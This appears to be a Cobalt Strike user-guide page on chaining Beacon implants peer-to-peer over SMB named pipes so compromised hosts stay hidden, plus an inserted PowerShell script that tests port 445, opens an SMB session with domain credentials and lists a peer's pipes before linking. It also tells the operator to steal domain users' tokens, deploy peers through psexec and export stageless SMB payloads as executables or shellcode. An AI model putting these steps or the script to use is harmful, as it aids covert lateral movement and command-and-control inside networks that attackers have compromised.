Beacon Covert Peer-to-Peer Communication

It's hard to stay hidden when many compromised systems call out to the internet. Use Beacon's peer-to-peer communication to solve this problem. This feature lets you link Beacons to each other. Linked Beacons download tasks and send output through their parent Beacon.

Use mode smb to transform a Beacon into a peer that waits for another Beacon to connect.

Use link [ip address] to link the current Beacon to a peer that is waiting for a connection. When the current Beacon checks in, its linked peers will check in too.

To blend in with normal traffic, linked Beacons use SMB named pipes to communicate. There are a few caveats to this approach:

  1. Hosts with a Beacon peer must accept inbound TCP connections on port 445 (SMB) from the host of the Beacon that links to them.
  2. You may only link Beacons managed by the same Cobalt Strike instance.

If you get error 5 (ERROR_ACCESS_DENIED) when you try to link to a Beacon, the current Beacon's token is not accepted for an SMB session with the peer host. Steal a domain user's token or use shell net use \\host /U:DOMAIN\user password to establish a session with the host. An administrator account is not required for this; any valid domain user will do. Once you have a session, try to link to the Beacon again.
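The two caveats above (reachability of port 445 and a valid SMB session on the peer host) are cheap to check before issuing link. The script below is an added example and is not part of the Cobalt Strike manual or product: it tests TCP 445, establishes the same kind of session net use would, and then lists the peer's named pipes over SMB, which exercises exactly the access that link needs. The host name FILESRV01, the user CORP\jdoe and the -PipeFilter parameter are hypothetical; the page names no pipe, so pass the name your own peer listener uses.

```powershell
# Added example, not from the Cobalt Strike manual. Run from a PowerShell
# prompt on a domain-joined Windows host (or through Beacon, if your version
# offers a PowerShell command). Target, user and pipe filter are assumptions:
#   .\Test-SmbPeer.ps1 -Target FILESRV01 -User 'CORP\jdoe' -Password 'p@ss' -PipeFilter '*'
param(
    [Parameter(Mandatory = $true)][string]$Target,
    [string]$User,
    [string]$Password,
    [string]$PipeFilter = '*'   # assumed; substitute your peer's pipe name
)

# Caveat 1: the peer host must accept inbound TCP 445. A raw TcpClient with a
# timeout works on every Windows version, unlike Test-NetConnection.
function Test-Port445 {
    param([string]$ComputerName, [int]$TimeoutMs = 3000)
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, 445, $null, $null)
        $ok = $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)
        if ($ok) { $client.EndConnect($async) }
        return $ok
    } catch {
        return $false
    } finally {
        $client.Close()
    }
}

if (-not (Test-Port445 -ComputerName $Target)) {
    Write-Output "[-] ${Target}:445 is not reachable; link will fail (caveat 1)"
    return
}
Write-Output "[+] ${Target}:445 reachable"

# Error 5 (access denied) on link means there is no usable SMB session with the
# peer. Any valid domain user is enough; administrator rights are not needed.
# This is the same thing as Beacon's: shell net use \\host /U:DOMAIN\user password
# Both user and password are required here so net use never prompts (a prompt
# would hang a non-interactive session).
if ($User -and $Password) {
    $out = & net use "\\$Target" /USER:$User $Password 2>&1
    if ($LASTEXITCODE -ne 0) {
        Write-Output "[-] net use to \\$Target failed: $out"
        return
    }
    Write-Output "[+] SMB session to \\$Target established as $User"
}

# Listing \\host\pipe\ enumerates the peer's named pipes through the SMB
# session just established. A peer waiting for a link exposes a pipe here; if
# this listing is denied, link will be denied with the same token.
try {
    $pipes = [System.IO.Directory]::GetFiles("\\$Target\pipe\") |
        ForEach-Object { Split-Path $_ -Leaf } |
        Where-Object { $_ -like $PipeFilter }
    Write-Output "[+] $(@($pipes).Count) pipe(s) on $Target matching '$PipeFilter':"
    $pipes | ForEach-Object { Write-Output "    $_" }
} catch {
    Write-Output "[-] could not enumerate \\$Target\pipe\ : $($_.Exception.Message)"
}
```

If the pipe listing succeeds under the token you intend to link with, link [ip address] should succeed too; if it fails with access denied, fix the session (token or net use) before retrying rather than retrying the link itself.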

To destroy a Beacon link, use unlink [ip address] from either the parent or the child. Later, you may link to the unlinked Beacon again (or link to it from another Beacon).

Once a Beacon becomes a peer, there is no way to make it beacon over HTTP or DNS again. If you'd like to kill a Beacon peer, use the exit command. If you'd like the host to beacon over HTTP or DNS, task the Beacon peer to give you another Beacon session on that host through an HTTP or DNS listener.

Beacon Peer as a Payload

Some systems can't talk to the internet. In these cases, it's nice to have a way to deliver a ready-to-link Beacon so you may connect to it. Use [host] -> Login -> psexec or [host] -> Login -> psexec (psh) with the beacon (connect to target) listener. This will run a Beacon peer on a host without the need to connect to the internet to stage.

You may set up a listener to deliver a peer-to-peer Beacon as well. Create a listener for windows/beacon_smb/reverse_tcp. This listener will stage your peer-to-peer Beacon. After it stages, you will still need to link to it from another Beacon.

If staging is cumbersome, you may ask Cobalt Strike to export a fully staged peer-to-peer Beacon as an executable, DLL, PowerShell script, or raw blob of shellcode. Go to Payloads -> Windows Stageless Payload and select SMB Beacon.


Related Topics